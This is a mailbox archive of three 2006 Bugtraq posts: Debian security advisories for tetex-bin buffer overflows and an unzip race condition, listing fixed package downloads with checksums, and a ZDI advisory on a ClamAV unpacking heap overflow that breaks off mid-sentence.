Content-Transfer-Encoding: 8bit
MIME-Version: 1.0
User-Agent: dsa-launch $Revision: 1.18 $
X-Debian: PGP check passed for security officers
Subject: [SECURITY] [DSA 937-1] New tetex-bin packages fix arbitrary code execution
Priority: urgent
Resent-Message-ID: <ah_0OC.A.SaG.09jxDB@murphy>
Reply-To: listadmin@SECURITYFOCUS.COM
Mail-Followup-To: bugtraq@securityfocus.com
To: bugtraq@securityfocus.com
Resent-Date: Thu, 12 Jan 2006 05:37:24 -0600 (CST)
Resent-From: list@murphy.debian.org (Mailing List Manager)
Status:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- --------------------------------------------------------------------------
Debian Security Advisory DSA 937-1 security@debian.org
http://www.debian.org/security/ Martin Schulze
January 12th, 2006
http://www.debian.org/security/faq
- --------------------------------------------------------------------------
Package : tetex-bin
Vulnerability : buffer overflows
Problem type : remote
Debian-specific: no
CVE IDs : CVE-2005-3191 CVE-2005-3192 CVE-2005-3624 CVE-2005-3625
CVE-2005-3626 CVE-2005-3627 CVE-2005-3628
CERT advisory :
BugTraq ID :
Debian Bug : 342292
"infamous41md" and Chris Evans discovered several heap based buffer
overflows in xpdf, the Portable Document Format (PDF) suite, which is
also present in tetex-bin, the binary files of teTeX, and which can
lead to a denial of service by crashing the application or possibly to
the execution of arbitrary code.
For the old stable distribution (woody) these problems have been fixed in
version 1.0.7+20011202-7.7.
For the stable distribution (sarge) these problems have been fixed in
version 2.0.2-30sarge4.
For the unstable distribution (sid) these problems have been fixed in
version 0.4.3-2 of poppler against which tetex-bin links.
We recommend that you upgrade your tetex-bin package.
Upgrade Instructions
- --------------------
wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.
If you are using the apt-get package manager, use the line for
sources.list as given below:
apt-get update
will update the internal database
apt-get upgrade
will install corrected packages
You may use an automated update by adding the resources from the
footer to the proper configuration.
Debian GNU/Linux 3.0 alias woody
- --------------------------------
Source archives:
http://security.debian.org/pool/updates/main/t/tetex-bin/tetex-bin_1.0.7+20011202-7.7.dsc
Size/MD5 checksum: 874 4fe4cb1a4bb2d39afc7f92948bafe6af
http://security.debian.org/pool/updates/main/t/tetex-bin/tetex-bin_1.0.7+20011202-7.7.tar.gz
Size/MD5 checksum: 10328904 be3ba73c70f6c50637069868c56a7d9e
Alpha architecture:
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea-dev_1.0.7+20011202-7.7_alpha.deb
Size/MD5 checksum: 84666 14987fa20077b5ce0a10f64d0df7e25f
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea3_1.0.7+20011202-7.7_alpha.deb
Size/MD5 checksum: 53260 7736b2f52cbdd476e8d4b8339b5d8b72
http://security.debian.org/pool/updates/main/t/tetex-bin/tetex-bin_1.0.7+20011202-7.7_alpha.deb
Size/MD5 checksum: 4569310 e5063538a36c4fd7aa514f2e8711aea0
ARM architecture:
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea-dev_1.0.7+20011202-7.7_arm.deb
Size/MD5 checksum: 65270 472d8a8a0f9823eab4b57a9a95515c01
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea3_1.0.7+20011202-7.7_arm.deb
Size/MD5 checksum: 43782 d2dde880cf11acfdaa89d51dbc3735d5
http://security.debian.org/pool/updates/main/t/tetex-bin/tetex-bin_1.0.7+20011202-7.7_arm.deb
Size/MD5 checksum: 3704454 62ecd37b4548deed4aa633083eda9e3a
Intel IA-32 architecture:
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea-dev_1.0.7+20011202-7.7_i386.deb
Size/MD5 checksum: 62610 b019a923fe66e306fe5864373f35e24a
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea3_1.0.7+20011202-7.7_i386.deb
Size/MD5 checksum: 40920 f42ec41bd53e2a99315aae7f3dd5657a
http://security.debian.org/pool/updates/main/t/tetex-bin/tetex-bin_1.0.7+20011202-7.7_i386.deb
Size/MD5 checksum: 3137616 24d0d5e485fd32f004aba99607d5b267
Intel IA-64 architecture:
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea-dev_1.0.7+20011202-7.7_ia64.deb
Size/MD5 checksum: 89722 3ff4685d8757f3f34f69d1d3038b99ee
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea3_1.0.7+20011202-7.7_ia64.deb
Size/MD5 checksum: 63476 2d5255d1a7e38287f68692f0fe5dd171
http://security.debian.org/pool/updates/main/t/tetex-bin/tetex-bin_1.0.7+20011202-7.7_ia64.deb
Size/MD5 checksum: 5599966 6cd21572aad64c291f728cfd8ddf5753
HP Precision architecture:
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea-dev_1.0.7+20011202-7.7_hppa.deb
Size/MD5 checksum: 79344 6cd09b3241459a76bc333ec2cca26eb3
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea3_1.0.7+20011202-7.7_hppa.deb
Size/MD5 checksum: 49540 042b7d2e4889fbed4165d86e3841c396
http://security.debian.org/pool/updates/main/t/tetex-bin/tetex-bin_1.0.7+20011202-7.7_hppa.deb
Size/MD5 checksum: 4107634 2253868a707890f55508be0a8d2b5084
Motorola 680x0 architecture:
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea-dev_1.0.7+20011202-7.7_m68k.deb
Size/MD5 checksum: 61938 328fa7a34388dbdd0bf3d77199f46e83
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea3_1.0.7+20011202-7.7_m68k.deb
Size/MD5 checksum: 41538 6e3a03abbf8382b2aaed4abc95115e34
http://security.debian.org/pool/updates/main/t/tetex-bin/tetex-bin_1.0.7+20011202-7.7_m68k.deb
Size/MD5 checksum: 2923636 fcd6d90ba74b613de76fd32834c2f250
Big endian MIPS architecture:
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea-dev_1.0.7+20011202-7.7_mips.deb
Size/MD5 checksum: 75074 410d60865596a9e67e0dc721b703610e
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea3_1.0.7+20011202-7.7_mips.deb
Size/MD5 checksum: 42556 9a09bb7af1668ce16cee128f67d2da50
http://security.debian.org/pool/updates/main/t/tetex-bin/tetex-bin_1.0.7+20011202-7.7_mips.deb
Size/MD5 checksum: 3941504 a6f1b0d37fc2f6dcbfd9d6c245551cf1
Little endian MIPS architecture:
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea-dev_1.0.7+20011202-7.7_mipsel.deb
Size/MD5 checksum: 74864 db91b18d0295fd07a1771f0fdc910730
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea3_1.0.7+20011202-7.7_mipsel.deb
Size/MD5 checksum: 42760 293b2e9ea53c8664208b4eaa5d7d038b
http://security.debian.org/pool/updates/main/t/tetex-bin/tetex-bin_1.0.7+20011202-7.7_mipsel.deb
Size/MD5 checksum: 3899710 d160c22beba8a431496557b59218ebee
PowerPC architecture:
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea-dev_1.0.7+20011202-7.7_powerpc.deb
Size/MD5 checksum: 73944 edc0023d5a5f6c7810e5e39518e9075c
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea3_1.0.7+20011202-7.7_powerpc.deb
Size/MD5 checksum: 45460 1fa491c88047f14874e162129943a0f2
http://security.debian.org/pool/updates/main/t/tetex-bin/tetex-bin_1.0.7+20011202-7.7_powerpc.deb
Size/MD5 checksum: 3588892 ec0621101b8f88a8e6886611f476a23b
IBM S/390 architecture:
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea-dev_1.0.7+20011202-7.7_s390.deb
Size/MD5 checksum: 64262 f8383550467d7d3f0dddb35694b4b453
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea3_1.0.7+20011202-7.7_s390.deb
Size/MD5 checksum: 43938 dc3005de68ffb1f120af9b98a4138ad7
http://security.debian.org/pool/updates/main/t/tetex-bin/tetex-bin_1.0.7+20011202-7.7_s390.deb
Size/MD5 checksum: 3441798 30d05314a39832a47b3b91f900e78d10
Sun Sparc architecture:
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea-dev_1.0.7+20011202-7.7_sparc.deb
Size/MD5 checksum: 70704 dc6dd4572fe8dc8d79d645190dd5b9e8
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea3_1.0.7+20011202-7.7_sparc.deb
Size/MD5 checksum: 48910 cfe4a6905dbd392494d200a64240604d
http://security.debian.org/pool/updates/main/t/tetex-bin/tetex-bin_1.0.7+20011202-7.7_sparc.deb
Size/MD5 checksum: 3599016 000aa70472574b64334c612e8dc6f79b
Debian GNU/Linux 3.1 alias sarge
- --------------------------------
Source archives:
http://security.debian.org/pool/updates/main/t/tetex-bin/tetex-bin_2.0.2-30sarge4.dsc
Size/MD5 checksum: 1004 983ccc6f8176a0beedda5df8a06e3537
http://security.debian.org/pool/updates/main/t/tetex-bin/tetex-bin_2.0.2-30sarge4.diff.gz
Size/MD5 checksum: 154375 3d72a9201f38d2dde021df25b6e1649c
http://security.debian.org/pool/updates/main/t/tetex-bin/tetex-bin_2.0.2.orig.tar.gz
Size/MD5 checksum: 11677169 8f02d5940bf02072ce5fe05429c90e63
Alpha architecture:
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea-dev_2.0.2-30sarge4_alpha.deb
Size/MD5 checksum: 89842 6de1e46a20510337254c069cec4d8590
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea3_2.0.2-30sarge4_alpha.deb
Size/MD5 checksum: 65424 ceb0f7a0bba00d19b0e787d465ccfe2d
http://security.debian.org/pool/updates/main/t/tetex-bin/tetex-bin_2.0.2-30sarge4_alpha.deb
Size/MD5 checksum: 5135466 f1ee07be1b52761c5c421252e69b5fec
AMD64 architecture:
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea-dev_2.0.2-30sarge4_amd64.deb
Size/MD5 checksum: 72772 c7912ef834249631873ca38061306b32
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea3_2.0.2-30sarge4_amd64.deb
Size/MD5 checksum: 61922 7601e110af324ee3cb90aec31c1a2c4b
http://security.debian.org/pool/updates/main/t/tetex-bin/tetex-bin_2.0.2-30sarge4_amd64.deb
Size/MD5 checksum: 4356908 4fd1dd53475b92b7d3ded8bc23a84d23
ARM architecture:
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea-dev_2.0.2-30sarge4_arm.deb
Size/MD5 checksum: 67808 ee9b99d5159d1651f6a29768b4cf0854
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea3_2.0.2-30sarge4_arm.deb
Size/MD5 checksum: 58142 48e671e8b106b363d8761b3d20acc5ec
http://security.debian.org/pool/updates/main/t/tetex-bin/tetex-bin_2.0.2-30sarge4_arm.deb
Size/MD5 checksum: 4300642 c8049249d1904b75c38081129bc5467e
Intel IA-32 architecture:
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea-dev_2.0.2-30sarge4_i386.deb
Size/MD5 checksum: 66218 d349881df541b5f7383e5a5390ac238a
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea3_2.0.2-30sarge4_i386.deb
Size/MD5 checksum: 59176 81412a2ee64924929205b718813970bb
http://security.debian.org/pool/updates/main/t/tetex-bin/tetex-bin_2.0.2-30sarge4_i386.deb
Size/MD5 checksum: 3939522 fe9e13180506bb76b073be1e289d214e
Intel IA-64 architecture:
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea-dev_2.0.2-30sarge4_ia64.deb
Size/MD5 checksum: 89822 abc527d1eccb607d0731be6200352e75
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea3_2.0.2-30sarge4_ia64.deb
Size/MD5 checksum: 73492 b7ba1d9e84583256f33a1c5abe76162e
http://security.debian.org/pool/updates/main/t/tetex-bin/tetex-bin_2.0.2-30sarge4_ia64.deb
Size/MD5 checksum: 5909228 984e273287f9d5dbee2e8310ab43ae69
HP Precision architecture:
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea-dev_2.0.2-30sarge4_hppa.deb
Size/MD5 checksum: 78310 0e86d99930bf65fdc9c3479089a6a20b
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea3_2.0.2-30sarge4_hppa.deb
Size/MD5 checksum: 66644 21cab5ff1f28857f08b1771de7c3f461
http://security.debian.org/pool/updates/main/t/tetex-bin/tetex-bin_2.0.2-30sarge4_hppa.deb
Size/MD5 checksum: 4612710 fdab445f3c33ae90180d3c834044fc40
Motorola 680x0 architecture:
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea-dev_2.0.2-30sarge4_m68k.deb
Size/MD5 checksum: 63502 78c53919dcfe97aedbc80b1fc887e204
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea3_2.0.2-30sarge4_m68k.deb
Size/MD5 checksum: 58736 69a55de426d9e122adc441b26c9bb062
http://security.debian.org/pool/updates/main/t/tetex-bin/tetex-bin_2.0.2-30sarge4_m68k.deb
Size/MD5 checksum: 3600916 b05f9a5118f7028e5c437c5749bfe79f
Big endian MIPS architecture:
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea-dev_2.0.2-30sarge4_mips.deb
Size/MD5 checksum: 75558 6449710e39b1ebad2c982bcad599e7f0
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea3_2.0.2-30sarge4_mips.deb
Size/MD5 checksum: 59190 d1fa5b3b77fd4a24d1bc65fb5bce6a90
http://security.debian.org/pool/updates/main/t/tetex-bin/tetex-bin_2.0.2-30sarge4_mips.deb
Size/MD5 checksum: 4602728 8454c9ddb3922c981e8d5cc5bf59ad1e
Little endian MIPS architecture:
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea-dev_2.0.2-30sarge4_mipsel.deb
Size/MD5 checksum: 75546 7bbac980fa4a95d71ebd4de2fe2b2b5b
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea3_2.0.2-30sarge4_mipsel.deb
Size/MD5 checksum: 59430 ea2fd76fbc73cad63efef3b939c89aa1
http://security.debian.org/pool/updates/main/t/tetex-bin/tetex-bin_2.0.2-30sarge4_mipsel.deb
Size/MD5 checksum: 4559108 fc52f040b130e7954230cffdd91d1145
PowerPC architecture:
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea-dev_2.0.2-30sarge4_powerpc.deb
Size/MD5 checksum: 74904 8a3d0d1292f0978eab3b39d6f96a97e9
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea3_2.0.2-30sarge4_powerpc.deb
Size/MD5 checksum: 63372 09c6961bbf8e5280ab1f618dd443106c
http://security.debian.org/pool/updates/main/t/tetex-bin/tetex-bin_2.0.2-30sarge4_powerpc.deb
Size/MD5 checksum: 4382198 62e8dec6600f7fdcee4e11bc29258766
IBM S/390 architecture:
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea-dev_2.0.2-30sarge4_s390.deb
Size/MD5 checksum: 71844 48a4bded5ebdb5719f5b72fc0bb4ea60
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea3_2.0.2-30sarge4_s390.deb
Size/MD5 checksum: 63614 9fdebe54556dba9bb6fd3cdd5bab2034
http://security.debian.org/pool/updates/main/t/tetex-bin/tetex-bin_2.0.2-30sarge4_s390.deb
Size/MD5 checksum: 4269024 36f0cf0d6f8f73f569af231b7b47c53e
Sun Sparc architecture:
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea-dev_2.0.2-30sarge4_sparc.deb
Size/MD5 checksum: 70022 7cfdf14b376e0249ae24bb77fb1ae73a
http://security.debian.org/pool/updates/main/t/tetex-bin/libkpathsea3_2.0.2-30sarge4_sparc.deb
Size/MD5 checksum: 60990 f25104fe0c734c162f75876bdaf797aa
http://security.debian.org/pool/updates/main/t/tetex-bin/tetex-bin_2.0.2-30sarge4_sparc.deb
Size/MD5 checksum: 4156948 a5ae0e1018b2ddc41de89accf9aa10d6
These files will probably be moved into the stable distribution on
its next update.
- ---------------------------------------------------------------------------------
For apt-get: deb
http://security.debian.org/ stable/updates main
For dpkg-ftp:
ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and
http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (GNU/Linux)
iD8DBQFDxj5FW5ql+IAeqTIRAiSvAJ4nLrbz5mX/YGj988kKJvTyxWjPUACdHocZ
DXgbf2rREWYvVX/u3V1/tEg=SKyV
-----END PGP SIGNATURE-----
From - Thu Jan 12 18:23:07 2006
X-UIDL: 43c6e4da00000002
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-22838-lists=securityspace.com@securityfocus.com>
Delivered-To: pop0012@securityspace.com
Received: from outgoing.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 3DB1C32CF7
for <lists@securityspace.com>; Thu, 12 Jan 2006 18:21:29 -0500 (EST)
Received: from outgoing.securityfocus.com by outgoing.securityfocus.com
via smtpd (for mx.securityspace.com [69.28.227.216]) with ESMTP; Thu, 12 Jan 2006 15:21:27 -0800
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 291A523A1E1; Thu, 12 Jan 2006 11:59:24 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 874 invoked from network); 12 Jan 2006 04:34:36 -0000
Resent-Cc: recipient list not shown: ;
Old-Return-Path: <joey@infodrom.org>
X-Original-To: debian-security-announce@lists.debian.org
Message-Id: <m1Ex0Cp-000ojnC@finlandia.Infodrom.North.DE>
Date: Thu, 12 Jan 2006 12:01:23 +0100 (CET)
From: joey@infodrom.org (Martin Schulze)
Content-Type: text/plain; charset=iso-8859-1
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
MIME-Version: 1.0
User-Agent: dsa-launch $Revision: 1.18 $
X-Debian: PGP check passed for security officers
Subject: [SECURITY] [DSA 903-2] New unzip packages fix unauthorised permissions modification
Priority: urgent
Resent-Message-ID: <SmeAZB.A.wXD.vhjxDB@murphy>
Reply-To: listadmin@SECURITYFOCUS.COM
Mail-Followup-To: bugtraq@securityfocus.com
To: bugtraq@securityfocus.com
Resent-Date: Thu, 12 Jan 2006 05:07:27 -0600 (CST)
Resent-From: list@murphy.debian.org (Mailing List Manager)
Status:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- --------------------------------------------------------------------------
Debian Security Advisory DSA 903-2 security@debian.org
http://www.debian.org/security/ Martin Schulze
January 12th, 2006
http://www.debian.org/security/faq
- --------------------------------------------------------------------------
Package : unzip
Vulnerability : race condition
Problem type : local
Debian-specific: no
CVE ID :
CAN-2005-2475
BugTraq ID : 14450
Debian Bugs : 321927 343680
The unzip update in DSA 903 contained a regression so that symbolic
links that are resolved later in a zip archive aren't supported
anymore. This update corrects this behaviour. For completeness,
below plese find the original advisory text:
Imran Ghory discovered a race condition in the permissions setting
code in unzip. When decompressing a file in a directory an
attacker has access to, unzip could be tricked to set the file
permissions to a different file the user has permissions to.
For the old stable distribution (woody) this problem has been fixed in
version 5.50-1woody5.
For the stable distribution (sarge) this problem has been fixed in
version 5.52-1sarge3.
For the unstable distribution (sid) this problem has been fixed in
version 5.52-6.
We recommend that you upgrade your unzip package.
Upgrade Instructions
- --------------------
wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.
If you are using the apt-get package manager, use the line for
sources.list as given below:
apt-get update
will update the internal database
apt-get upgrade
will install corrected packages
You may use an automated update by adding the resources from the
footer to the proper configuration.
Debian GNU/Linux 3.0 alias woody
- --------------------------------
Source archives:
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.50-1woody5.dsc
Size/MD5 checksum: 571 75e2923b74af607785cbefbbea79d1ab
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.50-1woody5.diff.gz
Size/MD5 checksum: 6484 73efae47dcd377abb934e36805c16190
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.50.orig.tar.gz
Size/MD5 checksum: 1068379 6d27bcdf9b51d0ad0f78161d0f99582e
Alpha architecture:
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.50-1woody5_alpha.deb
Size/MD5 checksum: 160482 94b0a5e18d78866d92f375d6b93a22c3
ARM architecture:
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.50-1woody5_arm.deb
Size/MD5 checksum: 139374 bd8cc4c654c901b5c320b2cdbf09f31b
Intel IA-32 architecture:
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.50-1woody5_i386.deb
Size/MD5 checksum: 122808 1d5669290431fb7fe83f688447b22d84
Intel IA-64 architecture:
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.50-1woody5_ia64.deb
Size/MD5 checksum: 191010 1cd02c151f46b5f7872a7de3079ebc2a
HP Precision architecture:
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.50-1woody5_hppa.deb
Size/MD5 checksum: 146954 ee23ad6e2c40d38e4655be1f2666489d
Motorola 680x0 architecture:
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.50-1woody5_m68k.deb
Size/MD5 checksum: 119578 7765363163750bed7e72472bee09afc4
Big endian MIPS architecture:
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.50-1woody5_mips.deb
Size/MD5 checksum: 142950 97af77c03fb69936407c86394fb846a5
Little endian MIPS architecture:
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.50-1woody5_mipsel.deb
Size/MD5 checksum: 143422 98a0ab0fd751c246ebd50e5c62886217
PowerPC architecture:
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.50-1woody5_powerpc.deb
Size/MD5 checksum: 136368 b2bea065ae91032fe987aaf120e08ad9
IBM S/390 architecture:
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.50-1woody5_s390.deb
Size/MD5 checksum: 137044 151da2fddaaca890dbf5166140f23881
Sun Sparc architecture:
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.50-1woody5_sparc.deb
Size/MD5 checksum: 147498 022e8ca1cecf20178edd68296fd973aa
Debian GNU/Linux 3.1 alias sarge
- --------------------------------
Source archives:
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.52-1sarge3.dsc
Size/MD5 checksum: 528 b6e01dbb89f9130fa16650b16f4d4e32
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.52-1sarge3.diff.gz
Size/MD5 checksum: 5387 807b5d9e8efa85e8caab673eff38aff7
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.52.orig.tar.gz
Size/MD5 checksum: 1140291 9d23919999d6eac9217d1f41472034a9
Alpha architecture:
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.52-1sarge3_alpha.deb
Size/MD5 checksum: 175506 90375091fd0c2577518bfd7db2202272
AMD64 architecture:
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.52-1sarge3_amd64.deb
Size/MD5 checksum: 154876 7129ee6610e6ec0320141bb7aaa5288e
ARM architecture:
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.52-1sarge3_arm.deb
Size/MD5 checksum: 155430 3fb2c5576d1709c6d7cc1b89d61a50b8
Intel IA-32 architecture:
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.52-1sarge3_i386.deb
Size/MD5 checksum: 144934 0e860597ffe259038f7bb8e1ce2630df
Intel IA-64 architecture:
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.52-1sarge3_ia64.deb
Size/MD5 checksum: 206648 d261bf8a2e3c8fce3d0898355a7420db
HP Precision architecture:
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.52-1sarge3_hppa.deb
Size/MD5 checksum: 162840 91d7d512b915757bf7c7e3e8640efa0c
Motorola 680x0 architecture:
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.52-1sarge3_m68k.deb
Size/MD5 checksum: 133734 878d1597bd5ef623a6bc70f6446654a4
Big endian MIPS architecture:
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.52-1sarge3_mips.deb
Size/MD5 checksum: 163396 5cbe0e22136949f240031502ea07d456
Little endian MIPS architecture:
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.52-1sarge3_mipsel.deb
Size/MD5 checksum: 163966 4066fa1e97bad61c47be9b6ffa47179f
PowerPC architecture:
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.52-1sarge3_powerpc.deb
Size/MD5 checksum: 157388 25c3d9d685ec411e5b53cc0e8002ca8e
IBM S/390 architecture:
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.52-1sarge3_s390.deb
Size/MD5 checksum: 156494 bfeb0b1d801266334e6a46f0818a9e6f
Sun Sparc architecture:
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.52-1sarge3_sparc.deb
Size/MD5 checksum: 154952 e1e42335312202d8b3f0727e9d78fda9
These files will probably be moved into the stable distribution on
its next update.
- ---------------------------------------------------------------------------------
For apt-get: deb
http://security.debian.org/ stable/updates main
For dpkg-ftp:
ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and
http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (GNU/Linux)
iD8DBQFDxjcDW5ql+IAeqTIRArJQAJ48ZSIEK2BLNM8nw7eF+nYWcAp1SACglvjT
4zYhaiqXeH/DSpRL/YVOouM=ZkQw
-----END PGP SIGNATURE-----
From - Thu Jan 12 18:43:07 2006
X-UIDL: 43c6e98a00000001
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-22846-lists=securityspace.com@securityfocus.com>
Delivered-To: pop0012@securityspace.com
Received: from outgoing.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 29C7732D2E
for <lists@securityspace.com>; Thu, 12 Jan 2006 18:42:49 -0500 (EST)
Received: from outgoing.securityfocus.com by outgoing.securityfocus.com
via smtpd (for mx.securityspace.com [69.28.227.216]) with ESMTP; Thu, 12 Jan 2006 15:19:46 -0800
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id BE2DC23AFEB; Thu, 12 Jan 2006 15:58:35 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 9547 invoked from network); 12 Jan 2006 14:13:25 -0000
To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
Subject: ZDI-06-001: Clam AntiVirus UPX Unpacking Code Execution Vulnerability
MIME-Version: 1.0
X-Mailer: Lotus Notes Release 6.5.2 June 01, 2004
From: zdi-disclosures@3com.com
Message-ID: <OF6ECE2BEA.98D2231A-ON882570F4.006F295C-882570F4.00719A1F@3com.com>
Date: Thu, 12 Jan 2006 12:37:09 -0800
X-MIMETrack: Serialize by Router on USUT001/US/3Com(Release 6.0.3|September 26, 2003) at
01/12/2006 12:45:20 PM,
Serialize complete at 01/12/2006 12:45:20 PM
Content-Type: text/plain; charset="US-ASCII"
Status:
ZDI-06-001: Clam AntiVirus UPX Unpacking Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-06-001.html
January 12, 2006
-- CVE ID:
CVE-2006-0162
-- Affected Vendor:
Clam AntiVirus
-- Affected Products:
Clam AntiVirus 0.80 through 0.87.1
-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability since December 13, 2005 by Digital Vaccine protection
filter ID 3975. For further product information on the TippingPoint IPS:
http://www.tippingpoint.com
-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable ClamAV installations. Authentication is not required to
exploit this vulnerability.
This specific flaw exists within libclamav/fsg.c during the unpacking of
executable files compressed with FSG v1.33. Due to invalid bounds
checking when copying user-supplied data to heap allocated memory, an
exploitable memory corruption condition is created. The unpacking
algorithm for other versions of FSG is not affected.
-- Vendor Response:
Addressed in Clam AntiVirus version 0.88:
sf.net/project/shownotes.php?release_id84086&group_id�638
-- Disclosure Timeline:
2005.13.12 - Vulnerability reported to vendor
2005.13.12 - Digital Vaccine released to TippingPoint customers
2006.12.01 - Public release of advisory
-- Credit:
This vulnerability was discovered by an anonymous researcher.
-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, a division of 3Com, The Zero Day Initiative
(ZDI) represents a best-of-breed model for rewarding security
researchers for responsibly disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is used.
3Com does not re-sell the vulnerability details or any exploit code.
Instead, upon notifying the affected product vendor, 3Com provides its
customers with zero day protection through its intrusion prevention
technology. Explicit details regarding the specifics of the
